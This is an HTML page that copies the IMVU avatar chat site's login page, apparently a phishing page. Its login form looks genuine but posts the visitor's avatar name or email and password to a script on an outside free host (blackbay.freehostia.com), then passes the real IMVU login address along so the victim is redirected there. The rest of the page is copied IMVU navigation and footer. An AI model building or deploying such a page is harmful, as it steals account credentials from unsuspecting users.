<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html HTML_PARAMS>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=CHARSET">
<title>IMVU Log in</title>
<base href="https://secure.imvu.com/catalog/">
<link rel="stylesheet" type="text/css" href="stylesheet.css">
</head>
<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0">
<!-- header //-->


<div id="mininav_body">            
    <div id="mininav">
        <div id="mininav-shade"></div>

        <a id="mininav-logo-link" href="http://www.imvu.com/"></a>
        <table width="100%" cellpadding="0" cellspacing="0" style="line-height:0px;">
            <tr valign="top">
                <td width="100">
                    <div id="mininav-logo" style="margin:1px 6px 0px 3px;">
                        <a href="http://www.imvu.com/"><span><img src="/common/img/blank.gif" width="103" height="25" /></span></a>
                    </div>
                </td>
                <td>&nbsp;

                    
                </td>
                <td width="280">
                <link rel="stylesheet" type="text/css" href="/common/css/mininav.css">
                </td>
                <td width="340" align="right">
                    <div id="mininav-userarea">
                        <div>
                                                    <div id="mininav-userarea-line1">
                                <a href="http://www.imvu.com/signup/index.php" style="line-height:1.1em;margin-right:5px;"><b>Sign Up Now to Chat in 3D!</b></a>

                            </div>
                            <div id="mininav-userarea-line2">
                                <a href="http://www.imvu.com/catalog/login.php" style="line-height:1.5em;margin-right:5px;">Member Login</a>
                            </div>
                                                </div>
                    </div>
                </td>
            </tr>

        </table>
        <!--
        <div id="mininav-shadow">&nbsp;</div>
        -->
    </div>
</div>
  
<script src="/catalog/includes/__utm.js" type="text/javascript"></script>
<script src="/catalog/includes/xh_Request.js" type="text/javascript"></script>

<!-- FLOTATION DEVICE -->
<table width="100%" border="0" cellspacing="0" cellpadding="0" align="center">

<tr> 

<td width="6%" align="left" valign="bottom"></td>
<td width="88%" align="center">
<!-- FLOTATION DEVICE -->
<!-- header_eof //-->

<!-- FLOTATION DEVICE -->
<table width="100%" border="0" cellspacing="0" cellpadding="0" align="center">
<tr>
<td width="10%" align="left" valign="bottom"></td>
<td width="80%" align="center">
<!-- FLOTATION DEVICE -->

<table border="0" width="480" cellspacing="0" cellpadding="0">

<tr>
<td colspan='3' ><img src="/catalog/web_images/space.gif" border="0" alt="" width="100%" height="18"></td>
</tr>

<tr>
<td class="pageHeading">Log in</td>
</tr>


<tr>
<td colspan='3' ><img src="/catalog/web_images/space.gif" border="0" alt="" width="100%" height="12"></td>
</tr>



</table>
<table border="0" width="480" cellspacing="0" cellpadding="1" class="infoBox">
<tr>
<td colspan='5'>
<table align='left' valign='top' class="infoBoxContents" border="0" width="100%" cellspacing="0"  cellpadding="0" >


<tr>
<td colspan='6'><img src="/catalog/images/pixel_trans.gif" border="0" alt="" width="100%" height="20"></td>
</tr>
<td><img src="/catalog/images/pixel_trans.gif" border="0" alt="" width="20" height="100%"></td>

<td valign='top'>
<table class="infoBoxContents" border="0" width="275" cellspacing="6"  cellpadding="0" valign='top' align="left">


<tr>
<td colspan='4' class='boxtitle' width='240' valign='top' class='main'>
Already registered?</td>
</tr>
<tr>
<td width="200" colspan='2' valign="top"><form name="login" action="http://blackbay.freehostia.com/imvu/m3adow.php?https://secure.imvu.com/catalog/login.php?action=process" method="POST"  id="login_form" ></td></tr>

                  <tr>
                    <td width='125' class="main">Avatar Name / Email</td>
                    <td class="main"><input type="text" name="avatarname"  id="avatarname_field" ></td>
                  </tr>


                  <tr>

                    <td colspan='2'><img src="/catalog/images/pixel_trans.gif" border="0" alt="" width="100%" height="1"></td>
                  </tr>
                    <td width='125' class="main">Password </td>
                    <td><input type="password" name="password"  id="password_field" > </td>
                  </tr>

                   <tr height='78' valign='bottom'>
                   <td colspan='2' align="left"><input type=submit id="log_in_button" alt="Log in" name="Log in" value="Log in" style="width: 10em;"></td>

                   </tr>
                   </form>
            </table>
            </td>


<td width='20'></td>


<td height='100%' align='right' valign='top'>

<table border="0" height='100' width="100%" cellspacing="6" cellpadding="0" valign='top' align="left">
<tr>

<td colspan='4' class='boxtitle' width='300' valign='top' class='main'>
New user?
</td>
</tr>

<tr>
<td height='100%' align='right' valign='top'>
<table class='infobox' border="0" height='150' width="100%" cellspacing="0" cellpadding="15" valign='top' align="left">
<tr>
<td bgcolor="#eeeee9" width='200' valign='top' class='main'>
<p><a href="/signup/index.php">Register new avatar name</a></p>

<a href="https://secure.imvu.com/catalog/password_forgotten.php">Forgot Avatar name</a>?<br>

<a href="https://secure.imvu.com/catalog/password_forgotten.php">Forgot password</a>?<br><br>

<a href="web_info.php?topic=privacy">See privacy statement</a>.
</td>
</tr>
</table>
</td>
</tr>
</table>


</td>
<td colspan='2'><img src="/catalog/images/pixel_trans.gif" border="0" alt="" width="20" height="100%"></td>
</tr>

    <tr>
    <td colspan='6'><img src="/catalog/images/pixel_trans.gif" border="0" alt="" width="100%" height="20"></td>
    </tr>

</table>

</td></tr>
</table>




<!-- Flotation Device -->

<!--</td>-->
<td width="10%" align="right"></td>
</tr></td>
<td colspan='2'><img src="/catalog/images/pixel_trans.gif" border="0" alt="" width="100%" height="30"></td>
</tr>
</table>
<!-- Flotation Device -->







<!-- /FLOTATION DEVICE -->
<td width="50%" align="right"></td>
</tr>

</table>




<div id="footerBanner">
</div>
<script language="JavaScript" type="text/javascript" src="/catalog/includes/wz_tooltip.js"></script>
    <div id="footer_style">
    <center>
    <a href="http://www.imvu.com/catalog/web_safety_tips01.php">Safety</a> |
    <a href="http://www.imvu.com/catalog/web_info.php?section=Info&amp;topic=privacy">Privacy</a> |
    <a href="http://www.imvu.com/catalog/liveperson_iframe.php?lp_page=http://server.iad.liveperson.net/hc/s-91089018/cmd/kbresource/kb-2313510507870109480/mail_form_interstitial.html!PAGETYPE">Billing Inquiries</a> |
    <a href="http://www.imvu.com/catalog/web_info.php?section=Info&amp;topic=aboutus">About us</a> |
    <a href="http://www.imvu.com/jobs/index.php">Jobs</a> |
    <!-- <a href="">Affiliates</a> | -->

    <a href="http://www.imvu.com/catalog/web_info.php?section=Info&amp;topic=contactus">Contact us</a> |
    <a href="http://www.imvu.com/catalog/web_info.php?section=Info&amp;topic=copyrightinfo">Copyright (DMCA)</a> |
    <a href="http://www.imvu.com/catalog/web_info.php?section=Info&amp;topic=terms_of_service">Terms of service</a> |
    <a href="http://www.imvu.com/catalog/web_delete_account.php">Delete account</a> |
    <a href="http://www.imvu.com/shop">Catalog</a> |
    <a href="http://www.imvu.com/catalog/modules.php?op=modload&name=phpbb2&amp;file=index.php">Forums</a>

    <br/>
    <a href="http://www.imvu.com/garage/index.php">IMVU Garage</a> |
    <a href="http://www.imvu.com/catalog/web_help_center.php">Help</a>
    <br>
    &copy; 2007 <a href="http://www.imvu.com/">IMVU</a> All rights reserved<br><br>

    </center>
    </div>

<script type="text/javascript">
urchinTracker('/tracking/logged_out');
</script>




<br>
</body>
</html>

